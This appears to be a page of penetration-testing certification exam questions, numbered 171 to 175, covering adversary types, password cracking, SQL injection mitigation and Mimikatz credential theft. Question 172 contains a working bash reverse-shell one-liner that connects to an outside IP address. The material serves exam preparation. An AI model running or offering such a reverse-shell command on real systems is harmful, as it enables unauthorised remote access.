Question 171

A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?
  • Question 172

    A tester intends to run the following command on a target system:
    bash -i >& /dev/tcp/10.2.4.6/443 0> &1
    Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?
  • Question 173

    A tester was able to retrieve domain users' hashes. Which of the following tools can be used to uncover the users' passwords? (Choose two.)
  • Question 174

    A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
  • Question 175

    Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?